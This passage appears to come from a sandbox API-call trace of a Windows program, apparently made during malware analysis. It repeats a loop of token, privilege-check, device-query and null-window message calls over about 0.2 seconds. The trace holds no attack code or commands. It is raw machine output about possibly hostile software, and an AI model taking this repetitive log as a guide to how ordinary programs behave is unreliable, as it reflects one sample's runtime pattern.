ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.897] GetLastError () returned 0x3f0 [0084.897] GetCurrentProcess () returned 0xffffffff [0084.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.897] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.897] SetLastError (dwErrCode=0x522) [0084.897] CloseHandle (hObject=0x114) returned 1 [0084.897] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.897] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.897] GetLastError () returned 0x578 [0084.897] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.897] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.897] GetCurrentThread () returned 0xfffffffe [0084.897] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.897] GetLastError () returned 0x3f0 [0084.897] GetCurrentProcess () returned 0xffffffff [0084.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.897] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.897] SetLastError (dwErrCode=0x522) [0084.897] CloseHandle (hObject=0x114) returned 1 [0084.897] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.897] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.897] GetLastError () returned 0x578 [0084.897] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.897] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.897] GetCurrentThread () returned 0xfffffffe [0084.897] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.898] GetLastError () returned 0x3f0 [0084.898] GetCurrentProcess () returned 0xffffffff [0084.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.898] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.898] SetLastError (dwErrCode=0x522) [0084.898] CloseHandle (hObject=0x114) returned 1 [0084.898] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.898] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.898] GetLastError () returned 0x578 [0084.898] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.898] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.898] GetCurrentThread () returned 0xfffffffe [0084.898] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.898] GetLastError () returned 0x3f0 [0084.898] GetCurrentProcess () returned 0xffffffff [0084.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.898] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.898] SetLastError (dwErrCode=0x522) [0084.898] CloseHandle (hObject=0x114) returned 1 [0084.898] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.898] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.898] GetLastError () returned 0x578 [0084.898] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.898] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.898] GetCurrentThread () returned 0xfffffffe [0084.898] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.898] GetLastError () returned 0x3f0 [0084.898] GetCurrentProcess () returned 0xffffffff [0084.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.898] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.898] SetLastError (dwErrCode=0x522) [0084.898] CloseHandle (hObject=0x114) returned 1 [0085.110] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.110] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.110] GetLastError () returned 0x578 [0085.110] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.110] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.110] GetCurrentThread () returned 0xfffffffe [0085.110] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.110] GetLastError () returned 0x3f0 [0085.110] GetCurrentProcess () returned 0xffffffff [0085.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.110] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.111] SetLastError (dwErrCode=0x522) [0085.111] CloseHandle (hObject=0x114) returned 1 [0085.111] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.111] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.111] GetLastError () returned 0x578 [0085.111] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.111] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.111] GetCurrentThread () returned 0xfffffffe [0085.111] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.111] GetLastError () returned 0x3f0 [0085.111] GetCurrentProcess () returned 0xffffffff [0085.111] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.111] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.111] SetLastError (dwErrCode=0x522) [0085.111] CloseHandle (hObject=0x114) returned 1 [0085.111] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.111] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.111] GetLastError () returned 0x578 [0085.111] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.111] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.111] GetCurrentThread () returned 0xfffffffe [0085.111] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.111] GetLastError () returned 0x3f0 [0085.111] GetCurrentProcess () returned 0xffffffff [0085.111] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.111] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.111] SetLastError (dwErrCode=0x522) [0085.111] CloseHandle (hObject=0x114) returned 1 [0085.111] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.111] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.111] GetLastError () returned 0x578 [0085.111] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.111] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.111] GetCurrentThread () returned 0xfffffffe [0085.111] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.111] GetLastError () returned 0x3f0 [0085.112] GetCurrentProcess () returned 0xffffffff [0085.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.112] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.112] SetLastError (dwErrCode=0x522) [0085.112] CloseHandle (hObject=0x114) returned 1 [0085.112] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.112] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.112] GetLastError () returned 0x578 [0085.112] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.112] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.112] GetCurrentThread () returned 0xfffffffe [0085.112] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.112] GetLastError () returned 0x3f0 [0085.112] GetCurrentProcess () returned 0xffffffff [0085.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.112] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.112] SetLastError (dwErrCode=0x522) [0085.112] CloseHandle (hObject=0x114) returned 1 [0085.112] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.112] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.112] GetLastError () returned 0x578 [0085.112] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.112] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.112] GetCurrentThread () returned 0xfffffffe [0085.112] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.112] GetLastError () returned 0x3f0 [0085.112] GetCurrentProcess () returned 0xffffffff [0085.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.112] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.112] SetLastError (dwErrCode=0x522) [0085.112] CloseHandle (hObject=0x114) returned 1 [0085.112] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.112] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.112] GetLastError () returned 0x578 [0085.112] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.112] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.112] GetCurrentThread () returned 0xfffffffe [0085.112] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.112] GetLastError () returned 0x3f0 [0085.112] GetCurrentProcess () returned 0xffffffff [0085.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.112] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.112] SetLastError (dwErrCode=0x522) [0085.112] CloseHandle (hObject=0x114) returned 1 [0085.112] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.112] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.112] GetLastError () returned 0x578 [0085.113] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.113] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.113] GetCurrentThread () returned 0xfffffffe [0085.113] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.113] GetLastError () returned 0x3f0 [0085.113] GetCurrentProcess () returned 0xffffffff [0085.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.113] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.113] SetLastError (dwErrCode=0x522) [0085.113] CloseHandle (hObject=0x114) returned 1 [0085.113] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.113] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.113] GetLastError () returned 0x578 [0085.113] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.113] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.113] GetCurrentThread () returned 0xfffffffe [0085.113] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.113] GetLastError () returned 0x3f0 [0085.113] GetCurrentProcess () returned 0xffffffff [0085.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.113] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.113] SetLastError (dwErrCode=0x522) [0085.113] CloseHandle (hObject=0x114) returned 1 [0085.113] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.113] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.113] GetLastError () returned 0x578 [0085.113] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.113] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.113] GetCurrentThread () returned 0xfffffffe [0085.113] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.113] GetLastError () returned 0x3f0 [0085.113] GetCurrentProcess () returned 0xffffffff [0085.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.113] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.113] SetLastError (dwErrCode=0x522) [0085.113] CloseHandle (hObject=0x114) returned 1 [0085.113] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.113] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.113] GetLastError () returned 0x578 [0085.113] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.113] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.113] GetCurrentThread () returned 0xfffffffe [0085.113] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.113] GetLastError () returned 0x3f0 [0085.113] GetCurrentProcess () returned 0xffffffff [0085.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.113] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.113] SetLastError (dwErrCode=0x522) [0085.114] CloseHandle (hObject=0x114) returned 1 [0085.114] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.114] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.114] GetLastError () returned 0x578 [0085.114] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.114] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.114] GetCurrentThread () returned 0xfffffffe [0085.114] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.114] GetLastError () returned 0x3f0 [0085.114] GetCurrentProcess () returned 0xffffffff [0085.114] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.114] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.114] SetLastError (dwErrCode=0x522) [0085.114] CloseHandle (hObject=0x114) returned 1 [0085.114] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.114] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.114] GetLastError () returned 0x578 [0085.114] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.114] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.114] GetCurrentThread () returned 0xfffffffe [0085.114] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.114] GetLastError () returned 0x3f0 [0085.114] GetCurrentProcess () returned 0xffffffff [0085.114] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.114] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.114] SetLastError (dwErrCode=0x522) [0085.114] CloseHandle (hObject=0x114) returned 1 [0085.114] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.114] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.114] GetLastError () returned 0x578 [0085.114] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.114] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.114] GetCurrentThread () returned 0xfffffffe [0085.114] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.114] GetLastError () returned 0x3f0 [0085.114] GetCurrentProcess () returned 0xffffffff [0085.114] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.114] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.114] SetLastError (dwErrCode=0x522) [0085.114] CloseHandle (hObject=0x114) returned 1 [0085.114] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.114] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.114] GetLastError () returned 0x578 [0085.114] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.114] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.114] GetCurrentThread () returned 0xfffffffe [0085.114] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.115] GetLastError () returned 0x3f0 [0085.115] GetCurrentProcess () returned 0xffffffff [0085.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.115] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.115] SetLastError (dwErrCode=0x522) [0085.115] CloseHandle (hObject=0x114) returned 1 [0085.115] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.115] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.115] GetLastError () returned 0x578 [0085.115] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.115] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.115] GetCurrentThread () returned 0xfffffffe [0085.115] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.115] GetLastError () returned 0x3f0 [0085.115] GetCurrentProcess () returned 0xffffffff [0085.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.115] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.115] SetLastError (dwErrCode=0x522) [0085.115] CloseHandle (hObject=0x114) returned 1 [0085.115] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.115] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.115] GetLastError () returned 0x578 [0085.115] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.115] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.115] GetCurrentThread () returned 0xfffffffe [0085.115] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.115] GetLastError () returned 0x3f0 [0085.115] GetCurrentProcess () returned 0xffffffff [0085.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.115] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.115] SetLastError (dwErrCode=0x522) [0085.115] CloseHandle (hObject=0x114) returned 1 [0085.115] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.115] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.115] GetLastError () returned 0x578 [0085.115] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.115] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.115] GetCurrentThread () 